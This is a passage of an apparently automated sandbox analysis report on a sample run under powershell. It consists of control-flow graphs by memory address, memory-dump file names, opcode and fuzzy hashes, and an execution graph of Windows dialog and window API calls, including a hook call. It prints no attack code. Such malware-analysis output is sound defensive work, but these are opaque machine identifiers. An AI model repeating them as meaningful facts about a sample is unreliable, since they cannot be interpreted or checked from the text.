                                                                                                                                                              control_flow_graph 787 7ff84887d75e-7ff84887d7e7 793 7ff84887d7ed-7ff84887d7f7 787->793 794 7ff84887d8ec-7ff84887d922 787->794 795 7ff84887d7f9-7ff84887d811 793->795 796 7ff84887d813-7ff84887d820 793->796 805 7ff84887d94d-7ff84887d97d 794->805 806 7ff84887d924-7ff84887d94b 794->806 795->796 803 7ff84887d88d-7ff84887d897 796->803 804 7ff84887d822-7ff84887d825 796->804 807 7ff84887d899-7ff84887d8a5 803->807 808 7ff84887d8a6-7ff84887d8e9 803->808 804->803 809 7ff84887d827-7ff84887d82f 804->809 822 7ff84887d97f 805->822 823 7ff84887d980-7ff84887d991 805->823 806->805 808->794 809->794 812 7ff84887d835-7ff84887d83f 809->812 814 7ff84887d858-7ff84887d85c 812->814 815 7ff84887d841-7ff84887d851 812->815 814->803 817 7ff84887d85e-7ff84887d88c 814->817 822->823 826 7ff84887d994-7ff84887d9a0 823->826 827 7ff84887d993 823->827 828 7ff84887d9c6-7ff84887d9c8 826->828 829 7ff84887d9a2-7ff84887d9aa 826->829 827->826 828->829 833 7ff84887d9c9-7ff84887d9d0 828->833 831 7ff84887d9ab-7ff84887d9c5 829->831 831->828 833->831 835 7ff84887d9d2-7ff84887da24 833->835 838 7ff84887da2a-7ff84887da34 835->838 839 7ff84887dc13-7ff84887dc6d 835->839 840 7ff84887da4d-7ff84887da52 838->840 841 7ff84887da36-7ff84887da43 838->841 862 7ff84887dc6f-7ff84887dc8b 839->862 863 7ff84887dc98-7ff84887dcc1 839->863 842 7ff84887da58-7ff84887da5b 840->842 843 7ff84887dbb4-7ff84887dbbe 840->843 841->840 846 7ff84887da45-7ff84887da4b 841->846 849 7ff84887da5d-7ff84887da66 842->849 850 7ff84887da72-7ff84887da76 842->850 847 7ff84887dbcd-7ff84887dc10 843->847 848 7ff84887dbc0-7ff84887dbcc 843->848 846->840 847->839 849->850 850->843 856 7ff84887da7c-7ff84887dab3 850->856 873 7ff84887dad7 856->873 874 7ff84887dab5-7ff84887dad5 856->874 870 7ff84887dc8d-7ff84887dc96 862->870 875 7ff84887dcc4-7ff84887dcd5 863->875 876 7ff84887dcc3 863->876 870->863 877 7ff84887dad9-7ff84887dadb 873->877 874->877 879 7ff84887dcd8-7ff84887dcf8 875->879 880 7ff84887dcd7 875->880 876->875 877->843 883 7ff84887dae1-7ff84887dae4 877->883 879->870 881 7ff84887dcfa-7ff84887dd5b 879->881 880->879 892 7ff84887ddfc-7ff84887de06 881->892 893 7ff84887dd61-7ff84887dd86 881->893 886 7ff84887dafb 883->886 887 7ff84887dae6-7ff84887daf9 883->887 889 7ff84887dafd-7ff84887daff 886->889 887->889 889->843 891 7ff84887db05-7ff84887db3f 889->891 910 7ff84887db58-7ff84887db5e 891->910 911 7ff84887db41-7ff84887db4e 891->911 895 7ff84887de08-7ff84887de09 892->895 896 7ff84887de13-7ff84887de5b 892->896 893->892 903 7ff84887dd88-7ff84887dd98 893->903 899 7ff84887de0b-7ff84887de12 895->899 907 7ff84887dd9a-7ff84887dda3 903->907 908 7ff84887dda5-7ff84887ddbb 903->908 907->908 908->899 920 7ff84887ddbd-7ff84887ddf9 908->920 915 7ff84887db7a-7ff84887db7d 910->915 916 7ff84887db60-7ff84887db78 910->916 911->910 918 7ff84887db50-7ff84887db56 911->918 922 7ff84887db84-7ff84887db8d 915->922 916->915 918->910 920->892 924 7ff84887db8f-7ff84887dba4 922->924 925 7ff84887dba6-7ff84887dbb3 922->925 924->925
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000008.00000002.2248180292.00007FF848870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848870000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ff848870000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 84632faf49b6725777c0251d229b63ea5d7429e2a39713dd2380c76339eead42
                                                                                                                                                              • Instruction ID: a96c952a5a6fbda32ad3acce2a5bd9dc682ea1958ea3de2d86ec3aaf43b41674
                                                                                                                                                              • Opcode Fuzzy Hash: 84632faf49b6725777c0251d229b63ea5d7429e2a39713dd2380c76339eead42
                                                                                                                                                              • Instruction Fuzzy Hash: 81321422E1EACA4FE796AB285C652B57BF1EF56290F0801FBC04DC7197DE18AC05C356
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 932 7ff84887055d-7ff848870567 933 7ff84887056e-7ff84887057f 932->933 934 7ff848870569 932->934 936 7ff848870586-7ff848870597 933->936 937 7ff848870581 933->937 934->933 935 7ff84887056b 934->935 935->933 939 7ff84887059e-7ff8488705af 936->939 940 7ff848870599 936->940 937->936 938 7ff848870583 937->938 938->936 942 7ff8488705b6-7ff8488705c7 939->942 943 7ff8488705b1 939->943 940->939 941 7ff84887059b 940->941 941->939 945 7ff8488705ce-7ff84887068f 942->945 946 7ff8488705c9 942->946 943->942 944 7ff8488705b3 943->944 944->942 953 7ff8488708a6-7ff848870904 945->953 954 7ff848870695-7ff84887069f 945->954 946->945 947 7ff8488705cb 946->947 947->945 972 7ff84887092f-7ff84887093b 953->972 973 7ff848870906-7ff84887092d 953->973 955 7ff8488706bb-7ff8488706c8 954->955 956 7ff8488706a1-7ff8488706b9 954->956 963 7ff8488706ce-7ff8488706d1 955->963 964 7ff84887083b-7ff848870845 955->964 956->955 963->964 966 7ff8488706d7-7ff8488706df 963->966 967 7ff848870858-7ff8488708a3 964->967 968 7ff848870847-7ff848870857 964->968 966->953 971 7ff8488706e5-7ff8488706ef 966->971 967->953 974 7ff848870709-7ff84887070f 971->974 975 7ff8488706f1-7ff8488706ff 971->975 981 7ff848870946-7ff848870957 972->981 973->972 974->964 977 7ff848870715-7ff848870718 974->977 975->974 980 7ff848870701-7ff848870707 975->980 982 7ff84887071a-7ff84887072d 977->982 983 7ff848870761 977->983 980->974 994 7ff848870959 981->994 995 7ff848870960-7ff84887096f 981->995 982->953 996 7ff848870733-7ff84887073d 982->996 986 7ff848870763-7ff848870765 983->986 986->964 987 7ff84887076b-7ff84887076e 986->987 991 7ff848870785-7ff848870789 987->991 992 7ff848870770-7ff848870779 987->992 991->964 1003 7ff84887078f-7ff848870795 991->1003 992->991 994->995 1001 7ff848870978-7ff848870990 995->1001 1002 7ff848870971 995->1002 999 7ff84887073f-7ff848870754 996->999 1000 7ff848870756-7ff84887075f 996->1000 999->1000 1000->986 1005 7ff848870992-7ff84887099f 1001->1005 1006 7ff8488709a1-7ff8488709f5 1001->1006 1002->1001 1007 7ff848870797-7ff8488707a4 1003->1007 1008 7ff8488707b1-7ff8488707b7 1003->1008 1005->1006 1015 7ff848870a68-7ff848870a72 1006->1015 1016 7ff8488709f7-7ff848870a07 1006->1016 1007->1008 1021 7ff8488707a6-7ff8488707af 1007->1021 1012 7ff8488707b9-7ff8488707c6 1008->1012 1013 7ff8488707d3-7ff848870810 1008->1013 1012->1013 1028 7ff8488707c8-7ff8488707d1 1012->1028 1040 7ff848870829-7ff84887083a 1013->1040 1041 7ff848870812-7ff848870827 1013->1041 1017 7ff848870a7c-7ff848870ac1 1015->1017 1018 7ff848870a74-7ff848870a79 1015->1018 1024 7ff848870a09-7ff848870a12 1016->1024 1025 7ff848870a14-7ff848870a2a 1016->1025 1023 7ff848870a7a-7ff848870a7b 1018->1023 1021->1008 1024->1025 1025->1023 1036 7ff848870a2c-7ff848870a65 1025->1036 1028->1013 1041->1040
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000008.00000002.2248180292.00007FF848870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848870000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ff848870000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: c3ea678ff44d423d7c20650f3af80db1002420e8c977c00fe2c11c2be9c9f497
                                                                                                                                                              • Instruction ID: 9eabb184600a8b39852b92ec8f1227d0ee13bffd77e865eddc4ab1926d4d493d
                                                                                                                                                              • Opcode Fuzzy Hash: c3ea678ff44d423d7c20650f3af80db1002420e8c977c00fe2c11c2be9c9f497
                                                                                                                                                              • Instruction Fuzzy Hash: B6121461A0EBC95FE356A7785C252B47FE1EF96390F0901FBD088C7193DA19AC06C396
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1047 7ff848877f65-7ff848877ff4 1052 7ff84887825c-7ff84887831b 1047->1052 1053 7ff848877ffa-7ff848878004 1047->1053 1054 7ff84887801d-7ff848878022 1053->1054 1055 7ff848878006-7ff848878013 1053->1055 1058 7ff848878028-7ff84887802b 1054->1058 1059 7ff848878200-7ff84887820a 1054->1059 1055->1054 1064 7ff848878015-7ff84887801b 1055->1064 1060 7ff84887802d-7ff848878040 1058->1060 1061 7ff848878042 1058->1061 1062 7ff84887820c-7ff848878218 1059->1062 1063 7ff848878219-7ff848878259 1059->1063 1066 7ff848878044-7ff848878046 1060->1066 1061->1066 1063->1052 1064->1054 1066->1059 1069 7ff84887804c-7ff848878080 1066->1069 1081 7ff848878097 1069->1081 1082 7ff848878082-7ff848878095 1069->1082 1085 7ff848878099-7ff84887809b 1081->1085 1082->1085 1085->1059 1087 7ff8488780a1-7ff8488780a9 1085->1087 1087->1052 1088 7ff8488780af-7ff8488780b9 1087->1088 1089 7ff8488780bb-7ff8488780d3 1088->1089 1090 7ff8488780d5-7ff8488780e5 1088->1090 1089->1090 1090->1059 1094 7ff8488780eb-7ff84887811c 1090->1094 1094->1059 1099 7ff848878122-7ff84887814e 1094->1099 1103 7ff848878179 1099->1103 1104 7ff848878150-7ff848878177 1099->1104 1105 7ff84887817b-7ff84887817d 1103->1105 1104->1105 1105->1059 1107 7ff848878183-7ff84887818b 1105->1107 1108 7ff84887818d-7ff848878197 1107->1108 1109 7ff84887819b 1107->1109 1111 7ff848878199 1108->1111 1112 7ff8488781b7-7ff8488781e6 1108->1112 1113 7ff8488781a0-7ff8488781b6 1109->1113 1111->1113 1118 7ff8488781ed-7ff8488781ff 1112->1118 1113->1112
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000008.00000002.2248180292.00007FF848870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848870000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ff848870000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 0a1d3b92338f126c4045bc3e9c8e02d76f616d129f457e3b7cc18dfb573cf1b7
                                                                                                                                                              • Instruction ID: 5c044c3316d7f156529ff669473632765bd1c377e75b9e6a7a55be7c8fe26ece
                                                                                                                                                              • Opcode Fuzzy Hash: 0a1d3b92338f126c4045bc3e9c8e02d76f616d129f457e3b7cc18dfb573cf1b7
                                                                                                                                                              • Instruction Fuzzy Hash: 9AD1F131E1EA8E5FE795EB2898556B9BBF1EF15351F0800BED04CC7193DB28A805C369
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1150 7ff84887da6a-7ff84887da76 1152 7ff84887da7c-7ff84887dab3 1150->1152 1153 7ff84887dbb4-7ff84887dbbe 1150->1153 1163 7ff84887dad7 1152->1163 1164 7ff84887dab5-7ff84887dad5 1152->1164 1155 7ff84887dbcd-7ff84887dc6d 1153->1155 1156 7ff84887dbc0-7ff84887dbcc 1153->1156 1182 7ff84887dc6f-7ff84887dc8b 1155->1182 1183 7ff84887dc98-7ff84887dcc1 1155->1183 1165 7ff84887dad9-7ff84887dadb 1163->1165 1164->1165 1165->1153 1168 7ff84887dae1-7ff84887dae4 1165->1168 1171 7ff84887dafb 1168->1171 1172 7ff84887dae6-7ff84887daf9 1168->1172 1173 7ff84887dafd-7ff84887daff 1171->1173 1172->1173 1173->1153 1176 7ff84887db05-7ff84887db3f 1173->1176 1190 7ff84887db58-7ff84887db5e 1176->1190 1191 7ff84887db41-7ff84887db4e 1176->1191 1189 7ff84887dc8d-7ff84887dc96 1182->1189 1194 7ff84887dcc4-7ff84887dcd5 1183->1194 1195 7ff84887dcc3 1183->1195 1189->1183 1196 7ff84887db7a-7ff84887db7d 1190->1196 1197 7ff84887db60-7ff84887db78 1190->1197 1191->1190 1199 7ff84887db50-7ff84887db56 1191->1199 1200 7ff84887dcd8-7ff84887dcf8 1194->1200 1201 7ff84887dcd7 1194->1201 1195->1194 1204 7ff84887db84-7ff84887db8d 1196->1204 1197->1196 1199->1190 1200->1189 1203 7ff84887dcfa-7ff84887dd5b 1200->1203 1201->1200 1212 7ff84887ddfc-7ff84887de06 1203->1212 1213 7ff84887dd61-7ff84887dd86 1203->1213 1207 7ff84887db8f-7ff84887dba4 1204->1207 1208 7ff84887dba6-7ff84887dbb3 1204->1208 1207->1208 1215 7ff84887de08-7ff84887de09 1212->1215 1216 7ff84887de13-7ff84887de5b 1212->1216 1213->1212 1221 7ff84887dd88-7ff84887dd98 1213->1221 1218 7ff84887de0b-7ff84887de12 1215->1218 1224 7ff84887dd9a-7ff84887dda3 1221->1224 1225 7ff84887dda5-7ff84887ddbb 1221->1225 1224->1225 1225->1218 1230 7ff84887ddbd-7ff84887ddf9 1225->1230 1230->1212
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000008.00000002.2248180292.00007FF848870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848870000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ff848870000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 2fd9a67e1a0cdb42212509e536afa494cc8e311cab56262e6bc2ce6b031e894a
                                                                                                                                                              • Instruction ID: f7db503d98ff516c2d7747bad6f56b7326923700068137ddc6777b8dc5352877
                                                                                                                                                              • Opcode Fuzzy Hash: 2fd9a67e1a0cdb42212509e536afa494cc8e311cab56262e6bc2ce6b031e894a
                                                                                                                                                              • Instruction Fuzzy Hash: 0041E662F1EE875FF7A9B6281865378A6E2FF45391F5800BBC50EC31DADE1CA8054209
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000008.00000002.2245651317.00007FF84868D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF84868D000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ff84868d000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 6af88a33f9ff0d542f461a4cccbc1002bec3e4c25477342d18aaa9d4a144b04d
                                                                                                                                                              • Instruction ID: 2d7e79119b7ca00d1929ceaed17620cf5926da90dd1984aaf54dab84aff799c0
                                                                                                                                                              • Opcode Fuzzy Hash: 6af88a33f9ff0d542f461a4cccbc1002bec3e4c25477342d18aaa9d4a144b04d
                                                                                                                                                              • Instruction Fuzzy Hash: 7B41297080EBC45FE7569B3898459623FF0EF56360F1505EFD08DCB1A3E629A846C792
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000008.00000002.2248180292.00007FF848870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848870000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ff848870000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 6c0c4c4426e3ae2b2cd72cde2a154957498a8493ebc7437cf55cf4623aea300d
                                                                                                                                                              • Instruction ID: 24f13d5b60168c2ad54f264f2ba7af571cacb73b43f615f9f4d795d879c09573
                                                                                                                                                              • Opcode Fuzzy Hash: 6c0c4c4426e3ae2b2cd72cde2a154957498a8493ebc7437cf55cf4623aea300d
                                                                                                                                                              • Instruction Fuzzy Hash: 6B01813270C9088FDB99EA0CF885DE573E0EB9937171401ABD14ACB562DB22EC95C781
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000008.00000002.2248180292.00007FF848870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848870000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ff848870000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 6e5d517e7e3eb3682adeb1f52512e210035e574d35b618a2df940cd25d5042bb
                                                                                                                                                              • Instruction ID: cdff40dd629156beea242d4b0e880dcb31f8508bc2fc1b2122a6070e0c8818e8
                                                                                                                                                              • Opcode Fuzzy Hash: 6e5d517e7e3eb3682adeb1f52512e210035e574d35b618a2df940cd25d5042bb
                                                                                                                                                              • Instruction Fuzzy Hash: F4F0BE32A0D6448FD769EB0CE8005E8B3E0EF44320B1000BAE05DC70A3DB2AEC80C754
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000008.00000002.2248180292.00007FF848870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848870000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ff848870000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 2966f5dd921045595de225dafa487d6a521e8db1e1ea3d82ff14db8894c9df21
                                                                                                                                                              • Instruction ID: 8acf01e8aa7c50de4584e7ed9086baaa1a4ef06ccfcf005c10a354d9f467fc9a
                                                                                                                                                              • Opcode Fuzzy Hash: 2966f5dd921045595de225dafa487d6a521e8db1e1ea3d82ff14db8894c9df21
                                                                                                                                                              • Instruction Fuzzy Hash: 36F05832A0D6448FE759EB5CE8928E8B7E0EF05360B1400B6E05DCB4A3DB2AEC44C755
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000008.00000002.2246434097.00007FF8487A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8487A0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ff8487a0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: +$EJ_H$m
                                                                                                                                                              • API String ID: 0-2551601182
                                                                                                                                                              • Opcode ID: a9073f1e2bedd3d6c7680742a440ecd7a16aaa7d4b7ec6016c459cfc30cc42da
                                                                                                                                                              • Instruction ID: 88b02795852253a3314048ebf8f025eb3a4071640e5ea50dcbc325eecd496fd8
                                                                                                                                                              • Opcode Fuzzy Hash: a9073f1e2bedd3d6c7680742a440ecd7a16aaa7d4b7ec6016c459cfc30cc42da
                                                                                                                                                              • Instruction Fuzzy Hash: 2D628DB1E0CA599FE799EF18D4557A9BBE1FB98340F1041BEE04DD3282DF3859818B09
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000008.00000002.2246434097.00007FF8487A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8487A0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ff8487a0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: H$mL_H
                                                                                                                                                              • API String ID: 0-2472571685
                                                                                                                                                              • Opcode ID: efaccef2f28be5cd20bc94f3f55944ede4a40c4c2f3481d59cf61a47802dad4e
                                                                                                                                                              • Instruction ID: 13a1215a5a3a96d24eaac6ffe6ee322f71a6b62c012e29360267dad13d4e34f7
                                                                                                                                                              • Opcode Fuzzy Hash: efaccef2f28be5cd20bc94f3f55944ede4a40c4c2f3481d59cf61a47802dad4e
                                                                                                                                                              • Instruction Fuzzy Hash: B632B430A1CA498FEB94EB2CD455AB97BE2FFA9384F0441B9E40DC7296DF24EC418745
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000008.00000002.2246434097.00007FF8487A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8487A0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ff8487a0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: L_I$sK_^
                                                                                                                                                              • API String ID: 0-458045039
                                                                                                                                                              • Opcode ID: a61995e392ac1c20b8f72a53e191db7c532bad61ddea1dcc6287112a6fe79a53
                                                                                                                                                              • Instruction ID: 96232270f99662caab21f0f3a12a38c47f9ea8c82d748deb7799a4d3bc9e2915
                                                                                                                                                              • Opcode Fuzzy Hash: a61995e392ac1c20b8f72a53e191db7c532bad61ddea1dcc6287112a6fe79a53
                                                                                                                                                              • Instruction Fuzzy Hash: E432E531A1CA465FE758FA28A4656B973D2FF98390F44417DE44EC72C3DF28A8428789
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000008.00000002.2246434097.00007FF8487A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8487A0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ff8487a0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: e31b6c091ee6cd2bc089cb2a47c2e36bf96f0ef000d5491ae77ca5bc2ff41cba
                                                                                                                                                              • Instruction ID: d059cef90f8224835fa0ede414b94ab4a4dba141e8973bb60d6b38bea72e7b38
                                                                                                                                                              • Opcode Fuzzy Hash: e31b6c091ee6cd2bc089cb2a47c2e36bf96f0ef000d5491ae77ca5bc2ff41cba
                                                                                                                                                              • Instruction Fuzzy Hash: 1DA2D531A5C90A8FEB99EA2C8465B7477D2FF94740F1501B9D40EC72A3DF29EC428B49
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000008.00000002.2248180292.00007FF848870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848870000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ff848870000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: de93215676bfef33614c0a57fe87cf18a871bd78be4723c19154f3261827a81e
                                                                                                                                                              • Instruction ID: 5b0a5056412446b4704795a5bb2d4b789f630952f26533447ef377013e9c1d67
                                                                                                                                                              • Opcode Fuzzy Hash: de93215676bfef33614c0a57fe87cf18a871bd78be4723c19154f3261827a81e
                                                                                                                                                              • Instruction Fuzzy Hash: 4241B156E1EBC25FE3A6A7381C661A06FF0EF52690F1D01FAC089CB5D3DA0C68468365
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Execution Graph

                                                                                                                                                              Execution Coverage:13.9%
                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                              Signature Coverage:1.9%
                                                                                                                                                              Total number of Nodes:2000
                                                                                                                                                              Total number of Limit Nodes:75
                                                                                                                                                              execution_graph 19851 d6a8d0 19860 d6a400 19851->19860 19857 d6a926 19881 d6a5f0 19857->19881 19889 d69a70 19860->19889 19862 d6a411 19863 d697c0 5 API calls 19862->19863 19864 d6a422 19863->19864 19865 d697c0 5 API calls 19864->19865 19866 d6a433 19865->19866 19927 d68b40 19866->19927 19868 d6a463 19869 d699f0 2 API calls 19868->19869 19870 d6a497 19869->19870 19871 d699f0 2 API calls 19870->19871 19872 d6a4c8 19871->19872 19873 d697c0 19872->19873 19934 d6d910 19873->19934 19875 d697d7 GetDlgItem 19935 d65c90 GetParent 19875->19935 19878 d699f0 19938 d68a60 GetDlgItem 19878->19938 19880 d69a1c SetWindowPos 19880->19857 19939 d68a60 GetDlgItem 19881->19939 19883 d6a604 SetFocus 19884 d6a615 codecvt 19883->19884 19940 d68a30 19884->19940 19886 d6a623 codecvt 19945 d69100 19886->19945 19888 d6a64b 19930 d68a60 GetDlgItem 19889->19930 19891 d69aa2 GetWindowLongW 19892 d69ab0 19891->19892 19893 d69ac1 19891->19893 19894 d697c0 5 API calls 19892->19894 19931 d68a60 GetDlgItem 19893->19931 19894->19893 19896 d69ae9 GetWindowLongW 19897 d69af7 19896->19897 19899 d69b08 GetSystemMetrics GetSystemMetrics GetSystemMetrics GetSystemMetrics 19896->19899 19898 d697c0 5 API calls 19897->19898 19898->19899 19932 d6d910 19899->19932 19902 d69c0e GetParent 19903 d69c22 GetClientRect ClientToScreen ClientToScreen 19902->19903 19904 d69c66 codecvt 19902->19904 19903->19904 19905 d69cd6 SetWindowPos 19904->19905 19906 d69d7e 19905->19906 19907 d69cea 19905->19907 19908 d699f0 2 API calls 19906->19908 19909 d699f0 2 API calls 19907->19909 19910 d69d7c 19908->19910 19911 d69d01 19909->19911 19912 d69e51 GetSystemMetrics GetSystemMetrics 19910->19912 19914 d68b40 GetClientRect 19910->19914 19913 d697c0 5 API calls 19911->19913 19912->19862 19915 d69d12 19913->19915 19916 d69dbb 19914->19916 19918 d699f0 2 API calls 19915->19918 19917 d69e29 19916->19917 19920 d69dc7 19916->19920 19919 d699f0 2 API calls 19917->19919 19918->19910 19919->19912 19921 d699f0 2 API calls 19920->19921 19922 d69df4 19921->19922 19923 d697c0 5 API calls 19922->19923 19924 d69e05 19923->19924 19925 d699f0 2 API calls 19924->19925 19926 d69e27 19925->19926 19926->19912 19933 d6d910 19927->19933 19929 d68b53 GetClientRect 19929->19868 19930->19891 19931->19896 19932->19902 19933->19929 19934->19875 19936 d65ca7 19935->19936 19937 d65cab GetWindowRect ScreenToClient ScreenToClient 19935->19937 19936->19878 19937->19936 19938->19880 19939->19883 19948 d68a60 GetDlgItem 19940->19948 19942 d68a47 19949 d69790 SetWindowTextW 19942->19949 19983 d68a60 GetDlgItem 19945->19983 19947 d6911f SendMessageW 19947->19888 19948->19942 19952 d65cf0 19949->19952 19970 d65c20 19952->19970 19955 d66850 18 API calls 19956 d65d0f 19955->19956 19957 d79270 _DebugHeapAllocator 2 API calls 19956->19957 19958 d65d1f 19957->19958 19959 d79270 _DebugHeapAllocator 2 API calls 19958->19959 19960 d65d2c 19959->19960 19961 d79730 7 API calls 19960->19961 19962 d65d3c 19961->19962 19981 d704f0 ??3@YAXPAX 19962->19981 19964 d65d44 19982 d704f0 ??3@YAXPAX 19964->19982 19966 d65d4c codecvt 19967 d65d54 SetWindowTextW 19966->19967 19968 d74cd0 codecvt ??3@YAXPAX 19967->19968 19969 d65d6a 19968->19969 19969->19886 19971 d610d0 _Error_objects ??2@YAPAXI 19970->19971 19972 d65c2e GetWindowTextLengthW 19971->19972 19973 d65c41 19972->19973 19974 d65c6e 19972->19974 19976 d635b0 7 API calls 19973->19976 19975 d62c60 _DebugHeapAllocator 2 API calls 19974->19975 19978 d65c7a 19975->19978 19977 d65c57 GetWindowTextW 19976->19977 19977->19974 19979 d74cd0 codecvt ??3@YAXPAX 19978->19979 19980 d65c82 19979->19980 19980->19955 19981->19964 19982->19966 19983->19947 19998 d68cd0 19999 d68cef GetCurrentThreadId SetWindowsHookExW 19998->19999 20000 d68d0a 19998->20000 19999->20000 20001 d68d13 GetCurrentThreadId SetWindowsHookExW 20000->20001 20002 d68d2e 20000->20002 20001->20002 20003 d68d37 20002->20003 20004 d68d5b 20002->20004 20008 d67450 20003->20008 20011 d68990 20004->20011 20007 d68d59 20022 d6d910 20008->20022 20010 d67463 EndDialog 20010->20007 20012 d62c60 _DebugHeapAllocator 2 API calls 